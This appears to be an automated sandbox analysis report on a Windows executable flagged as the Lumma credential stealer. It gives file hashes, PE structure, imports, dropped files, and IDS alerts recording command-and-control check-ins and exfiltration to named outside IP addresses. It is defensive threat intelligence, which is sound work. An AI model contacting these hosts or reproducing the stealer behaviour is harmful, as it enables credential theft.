.F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD35D.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4613
Entropy (8bit):	4.483508496286503
Encrypted:	false
SSDEEP:	48:cvIwWl8zsXJg77aI9SdWpW8VYt0Ym8M4JBj4OqFnJ+q8BN2OQ7rsIs8Ned:uIjf5I7os7V8BJx4bJ6EnySed
MD5:	BDA0421CD035BD454069F733747F6AF2
SHA1:	55740F022DAEEAF025BD1D8F15E7B1B0C9CFE652
SHA-256:	EE7A9BC39005C21A7739C942831B5AAAB26A641BFF0E6F82F52A68623D06CB7F
SHA-512:	B77D7103FC30BD2071922AD674C4F9BBB55F1FFBF32D18BAEB384EF0FFA991E4FACC14BADBA3B03838E7147BB6DF771646DAE546DC2B1568BBBD05EDB7396494
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="668076" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe

Download File

Process:	C:\Users\user\Desktop\fuk7RfLrD3.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	341504
Entropy (8bit):	7.257573629179284
Encrypted:	false
SSDEEP:	6144:imcwLfcraiOA/aX5CkSnVmB2ZHgZSgGf:ieDccA/Y5CkSn0gZgs
MD5:	D66791DB5C8D7BF392361E2343F7A5EA
SHA1:	09784C6E0C0E2BE36C83F41535908039FE1AA343
SHA-256:	25C2A9D961D4110C9E66519B777AA070BEEC2388278ADBD68454D537422BD895
SHA-512:	E936C1E158ADC60FD348C695C088F5FE6F1F16EA58DB6FE211EEC3A426320F40619D56A3B43F3755B1BC178FF7ED7541618A9BF030D4AB1D2505101412A38361
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z.....k...k...k.......k....;.k.......k....d.k.9Q....k...j.m.k......k.......k.......k.Rich..k.........PE..L......e.................$...P.......^.......@....@.................................?........................................*..(.......h............................................................G..@...............t............................text...V#.......$.................. ..`.data.......@...`...(..............@....rsrc...h...........................@..@................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe

Download File

Process:	C:\Users\user\Desktop\fuk7RfLrD3.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	341504
Entropy (8bit):	7.257573629179284
Encrypted:	false
SSDEEP:	6144:imcwLfcraiOA/aX5CkSnVmB2ZHgZSgGf:ieDccA/Y5CkSn0gZgs
MD5:	D66791DB5C8D7BF392361E2343F7A5EA
SHA1:	09784C6E0C0E2BE36C83F41535908039FE1AA343
SHA-256:	25C2A9D961D4110C9E66519B777AA070BEEC2388278ADBD68454D537422BD895
SHA-512:	E936C1E158ADC60FD348C695C088F5FE6F1F16EA58DB6FE211EEC3A426320F40619D56A3B43F3755B1BC178FF7ED7541618A9BF030D4AB1D2505101412A38361
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: Ljrprfl3BH.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z.....k...k...k.......k....;.k.......k....d.k.9Q....k...j.m.k......k.......k.......k.Rich..k.........PE..L......e.................$...P.......^.......@....@.................................?........................................*..(.......h............................................................G..@...............t............................text...V#.......$.................. ..`.data.......@...`...(..............@....rsrc...h...........................@..@................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.416598722399312
Encrypted:	false
SSDEEP:	6144:Rcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNz5+NX:ui58oSWIZBk2MM6AFBhoR
MD5:	BABA2720F3077FC60A3D12C4568D8E49
SHA1:	FEF314614CB9A7DF3B075A9F89E90676172600A8
SHA-256:	164AFFD43513137E135E8E12506836B7B927817EA0171FE938F4EA6C40F4274F
SHA-512:	480F681C3A347E1E4D8E34A5A07F9EB6EEE92BFD34B21E4C57257DB67AAB4F1B118CABF46D357D8F22C73D39195612786A3884EFC4786F645780EF9FEF98E68F
Malicious:	false
Preview:	regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....hb...............................................................................................................................................................................................................................................................................................................................................i..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.812390514199354
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	fuk7RfLrD3.exe
File size:	504'320 bytes
MD5:	e6f64122e4831f8a05fbeb8c1e4a731a
SHA1:	493e31e97867ecb2ec1d34b44ef05b5c0eced980
SHA256:	40253172672ac968aef2b9335b582755ff4a256709959c39103a67b664e62adc
SHA512:	9c022817fb5f605e1eefa5b84ade9a6469e245bc917efb5ea2765397e6efec22bb40c9e7eb0aa81e05f08442047f259f75af03e7be025d81a02034bb8feaf6dd
SSDEEP:	12288:d5SffFvSFJCyx0iQuTyTZg2T8JQ2lTz8i:dcXFvSF0y0iQuOMO2dz8i
TLSH:	B1B49E12B2FA7D54FAB747328E3E86D4262FF9F14E74225D21147A9F08F29B1C122752
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A].. 3.. 3.. 3..r... 3..r... 3..r... 3...H.. 3.. 2.. 3..r... 3..r... 3..r... 3.Rich. 3.................PE..L......f...........

File Icon


Icon Hash:	86c7c30b0f4e0d99

Static PE Info

General

Entrypoint:	0x40164d
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x661AA4C9 [Sat Apr 13 15:29:13 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	fd9568248eaffda6229623eb6f3f5b6d

Entrypoint Preview

Instruction
call 00007F64585042CAh
jmp 00007F64584FFE6Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [004588F8h], eax
mov dword ptr [004588F4h], ecx
mov dword ptr [004588F0h], edx
mov dword ptr [004588ECh], ebx
mov dword ptr [004588E8h], esi
mov dword ptr [004588E4h], edi
mov word ptr [00458910h], ss
mov word ptr [00458904h], cs
mov word ptr [004588E0h], ds
mov word ptr [004588DCh], es
mov word ptr [004588D8h], fs
mov word ptr [004588D4h], gs
pushfd
pop dword ptr [00458908h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [004588FCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00458900h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0045890Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [00458848h], 00010001h
mov eax, dword ptr [00458900h]
mov dword ptr [004587FCh], eax
mov dword ptr [004587F0h], C0000409h
mov dword ptr [004587F4h], 00000001h
mov eax, dword ptr [00457004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00457008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000A0h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x55a2c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc6000	0x200e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x555b0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x54000	0x188	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5247b	0x52600	60325274917e8346dcec222939264fa5	False	0.8356144489757208	data	7.539255550524008	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x54000	0x2310	0x2400	79d98ac7991e1dd35716dd201196fd24	False	0.3657769097222222	SysEx File -	5.476570391994515	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x57000	0x67f7c	0x1800	c76cc40008c0f4a7382b0f1242d9a596	False	0.3369140625	data	3.3517617302579725	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.wuhojic	0xbf000	0x53e5	0x4800	f9debe3f07be68533bf0295e3d2ba68a	False	0.002224392361111111	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ragelu	0xc5000	0x15a	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc6000	0x200e8	0x20200	e0b4a1ea50fe61059a96ef24699c0574	False	0.3953520184824903	data	4.857324819939678	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_CURSOR	0xdd600	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0	0.4276315789473684
RT_CURSOR	0xdd748	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0	0.7368421052631579
RT_CURSOR	0xdd878	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.06130705394190871
RT_CURSOR	0xdfe48	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.31023454157782515
RT_ICON	0xc6b70	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	0.8523454157782516
RT_ICON	0xc7a18	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	0.8366425992779783
RT_ICON	0xc82c0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	0.7972350230414746
RT_ICON	0xc8988	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	0.796242774566474
RT_ICON	0xc8ef0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	0.8045643153526971
RT_ICON	0xcb498	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	0.8438524590163935
RT_ICON	0xcbe20	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	0.8625886524822695
RT_ICON	0xcc2f0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	0.3344882729211087
RT_ICON	0xcd198	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	0.39666064981949456
RT_ICON	0xcda40	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	0.3888248847926267
RT_ICON	0xce108	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	0.3959537572254335
RT_ICON	0xce670	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.22136929460580912
RT_ICON	0xd0c18	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.24765478424015008
RT_ICON	0xd1cc0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	0.28114754098360656
RT_ICON	0xd2648	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.3120567375886525
RT_ICON	0xd2b28	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.3307569296375267
RT_ICON	0xd39d0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.4611913357400722
RT_ICON	0xd4278	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.5282258064516129
RT_ICON	0xd4940	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.5469653179190751
RT_ICON	0xd4ea8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.3025328330206379
RT_ICON	0xd5f50	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.3008196721311475
RT_ICON	0xd68d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.3528368794326241
RT_ICON	0xd6da8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.28171641791044777
RT_ICON	0xd7c50	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.36597472924187724
RT_ICON	0xd84f8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.3738479262672811
RT_ICON	0xd8bc0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.36921965317919075
RT_ICON	0xd9128	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.2598547717842324
RT_ICON	0xdb6d0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.27790806754221387
RT_ICON	0xdc778	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.28524590163934427
RT_ICON	0xdd100	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.32358156028368795
RT_STRING	0xe0eb8	0x4c4	data	0.44344262295081965
RT_STRING	0xe1380	0x15e	data	0.5114285714285715
RT_STRING	0xe14e0	0x7d4	data	0.4241516966067864
RT_STRING	0xe1cb8	0x7b0	data	0.42327235772357724
RT_STRING	0xe2468	0x5f8	data	0.4443717277486911
RT_STRING	0xe2a60	0x6b6	data	0.43364377182770664
RT_STRING	0xe3118	0x66a	data	0.438489646772229
RT_STRING	0xe3788	0x6fa	data	0.4316909294512878
RT_STRING	0xe3e88	0x754	data	0.4253731343283582
RT_STRING	0xe45e0	0x422	data	0.4735349716446125
RT_STRING	0xe4a08	0x668	data	0.4329268292682927
RT_STRING	0xe5070	0x80e	data	0.4146459747817653
RT_STRING	0xe5880	0x668	data	0.4274390243902439
RT_STRING	0xe5ee8	0x1fe	data	0.49411764705882355
RT_ACCELERATOR	0xdd5e0	0x20	data	1.15625
RT_GROUP_CURSOR	0xdd730	0x14	data	1.15
RT_GROUP_CURSOR	0xdfe20	0x22	data	1.0588235294117647
RT_GROUP_CURSOR	0xe0cf0	0x14	data	1.25
RT_GROUP_ICON	0xcc288	0x68	data	0.7115384615384616
RT_GROUP_ICON	0xdd568	0x76	data	0.6779661016949152
RT_GROUP_ICON	0xd2ab0	0x76	data	0.6779661016949152
RT_GROUP_ICON	0xd6d40	0x68	data	0.7211538461538461
RT_VERSION	0xe0d08	0x1b0	data	0.5810185185185185

Imports

DLL

Import

KERNEL32.dll

GetNumaNodeProcessorMask, SetDefaultCommConfigA, SearchPathW, SetThreadContext, DebugActiveProcessStop, CreateProcessW, InterlockedIncrement, GetEnvironmentStringsW, CancelWaitableTimer, InterlockedCompareExchange, GetComputerNameW, GetTimeFormatA, GetModuleHandleW, GetCurrentThread, GetDateFormatA, SetProcessPriorityBoost, GlobalAlloc, LoadLibraryW, GetConsoleAliasW, GetVolumePathNameA, GetStartupInfoW, GetShortPathNameA, GetStartupInfoA, SetLastError, GetProcAddress, GetAtomNameA, LoadLibraryA, UnhandledExceptionFilter, DeleteTimerQueue, AddAtomA, FindAtomA, FoldStringA, OpenFileMappingW, FindFirstVolumeW, GetModuleHandleA, HeapAlloc, GetCommandLineA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetLastError, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, SetStdHandle, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, CreateFileA, CloseHandle, RaiseException

USER32.dll

GetProcessDefaultLayout

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-09T08:33:43.073702+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49743	172.67.179.207	443	TCP
2025-01-09T08:33:43.923495+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49753	176.113.115.19	80	TCP
2025-01-09T08:33:46.077341+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49768	104.21.80.1	443	TCP
2025-01-09T08:33:46.547903+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49768	104.21.80.1	443	TCP
2025-01-09T08:33:46.547903+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49768	104.21.80.1	443	TCP
2025-01-09T08:33:47.122891+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49775	104.21.80.1	443	TCP
2025-01-09T08:33:47.629217+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.7	49775	104.21.80.1	443	TCP
2025-01-09T08:33:47.629217+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49775	104.21.80.1	443	TCP
2025-01-09T08:33:48.448608+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49785	104.21.80.1	443	TCP
2025-01-09T08:33:49.015265+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.7	49785	104.21.80.1	443	TCP
2025-01-09T08:33:49.974237+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49796	104.21.80.1	443	TCP
2025-01-09T08:33:51.197920+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49803	104.21.80.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 08:33:42.149466038 CET	49743	443	192.168.2.7	172.67.179.207
Jan 9, 2025 08:33:42.149518013 CET	443	49743	172.67.179.207	192.168.2.7
Jan 9, 2025 08:33:42.149682045 CET	49743	443	192.168.2.7	172.67.179.207
Jan 9, 2025 08:33:42.161196947 CET	49743	443	192.168.2.7	172.67.179.207
Jan 9, 2025 08:33:42.161226988 CET	443	49743	172.67.179.207	192.168.2.7
Jan 9, 2025 08:33:42.651343107 CET	443	49743	172.67.179.207	192.168.2.7
Jan 9, 2025 08:33:42.651432037 CET	49743	443	192.168.2.7	172.67.179.207
Jan 9, 2025 08:33:42.772677898 CET	49743	443	192.168.2.7	172.67.179.207
Jan 9, 2025 08:33:42.772715092 CET	443	49743	172.67.179.207	192.168.2.7
Jan 9, 2025 08:33:42.773071051 CET	443	49743	172.67.179.207	192.168.2.7
Jan 9, 2025 08:33:42.773127079 CET	49743	443	192.168.2.7	172.67.179.207
Jan 9, 2025 08:33:42.777172089 CET	49743	443	192.168.2.7	172.67.179.207
Jan 9, 2025 08:33:42.819333076 CET	443	49743	172.67.179.207	192.168.2.7
Jan 9, 2025 08:33:43.073620081 CET	443	49743	172.67.179.207	192.168.2.7
Jan 9, 2025 08:33:43.073703051 CET	443	49743	172.67.179.207	192.168.2.7
Jan 9, 2025 08:33:43.073781967 CET	49743	443	192.168.2.7	172.67.179.207
Jan 9, 2025 08:33:43.075279951 CET	49743	443	192.168.2.7	172.67.179.207
Jan 9, 2025 08:33:43.075300932 CET	443	49743	172.67.179.207	192.168.2.7
Jan 9, 2025 08:33:43.075321913 CET	49743	443	192.168.2.7	172.67.179.207
Jan 9, 2025 08:33:43.075350046 CET	49743	443	192.168.2.7	172.67.179.207
Jan 9, 2025 08:33:43.216294050 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:43.221232891 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:43.224015951 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:43.224140882 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:43.228985071 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:43.923346043 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:43.923362017 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:43.923444986 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:43.923461914 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:43.923475027 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:43.923486948 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:43.923495054 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:43.923533916 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:43.923547029 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:43.923547029 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:43.923573971 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:43.923588037 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:43.923590899 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:43.923602104 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:43.923621893 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:43.923635006 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:43.928401947 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:43.928416967 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:43.928431034 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:43.928467989 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:43.928499937 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:43.928812027 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:43.928826094 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:43.928863049 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.045121908 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.045134068 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.045183897 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.045207024 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.045231104 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.045291901 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.045306921 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.045331001 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.045332909 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.045358896 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.045382977 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.045826912 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.045839071 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.045850992 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.045881033 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.045901060 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.045907974 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.045923948 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.045962095 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.046521902 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.046566010 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.046567917 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.046585083 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.046621084 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.046627998 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.046641111 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.046658993 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.046674967 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.046699047 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.047606945 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.047619104 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.047638893 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.047650099 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.047652006 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.047668934 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.047677040 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.047683954 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.047702074 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.047725916 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.048464060 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.048502922 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.048506975 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.048535109 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.049940109 CET	80	49753	176.113.115.19	192.168.2.7
